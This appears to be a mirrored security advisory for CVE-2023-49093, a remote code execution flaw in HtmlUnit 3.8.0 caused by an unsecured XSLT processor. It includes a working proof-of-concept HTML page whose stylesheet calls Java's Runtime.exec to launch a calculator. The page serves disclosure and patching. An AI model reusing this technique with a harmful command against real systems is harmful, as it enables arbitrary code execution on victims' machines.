CVE
GHSA-37vq-hr2f-g7h7
HtmlUnit vulnerable to Remote Code Execution (RCE) via XSTL
Summary
HtmlUnit 3.8.0 are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage
Details
Vulnerability code location:
org.htmlunit.activex.javascript.msxml.XSLProcessor#transform(org.htmlunit.activex.javascript.msxml.XMLDOMNode)
The reason for the vulnerability is that it was not enabled FEATURESECUREPROCESSING for the XSLT processor
PoC
pom.xml:
<dependency>
<groupId>org.htmlunit</groupId>
<artifactId>htmlunit</artifactId>
<version>3.8.0</version>
</dependency>code:
WebClient webClient = new WebClient(BrowserVersion.INTERNET_EXPLORER);
HtmlPage page = webClient.getPage("http://127.0.0.1:8080/test.html");
System.out.println(page.asNormalizedText());test.html:
<script>
var xslt = new ActiveXObject("Msxml2.XSLTemplate.6.0");
var xslDoc = new ActiveXObject("Msxml2.FreeThreadedDOMDocument.6.0");
var xslProc;
xslDoc.async = false;
xslDoc.loadXML(`<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
<xsl:template match="/">
<xsl:variable name="rtobject" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtobject,'open -a Calculator')"/>
<xsl:variable name="processString" select="ob:toString($process)"/>
<span><xsl:value-of select="$processString"/></span>
</xsl:template>
</xsl:stylesheet>`)
if (xslDoc.parseError.errorCode != 0) {
var myErr = xslDoc.parseError;
document.write("ParseError: "+myErr.reason);
} else {
xslt.stylesheet = xslDoc;
var xmlDoc = new ActiveXObject("Msxml2.DOMDocument.6.0");
xmlDoc.async = false;
xmlDoc.loadXML("<s></s>");
if (xmlDoc.parseError.errorCode != 0) {
var myErr = xmlDoc.parseError;
document.write("Document error: " + myErr.reason);
} else {
xslProc = xslt.createProcessor();
xslProc.input = xmlDoc;
xslProc.transform();
document.write(xslProc.output);
}
}
</script>
Impact
Remote Code Execution
Package Versions Affected
Package Version
patch Availability
Automatically patch vulnerabilities without upgrading
Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request
CVSS Version
Severity
Base Score
CVSS Version
Score Vector
C
H
U
9.8
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
C
H
U
9.8
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Related Resources
No items found.
References
https://github.com/HtmlUnit/htmlunit/security/advisories/GHSA-37vq-hr2f-g7h7, https://nvd.nist.gov/vuln/detail/CVE-2023-49093, https://github.com/HtmlUnit/htmlunit, https://www.htmlunit.org/changes-report.html#a3.9.0
Basic Information
Ecosystem
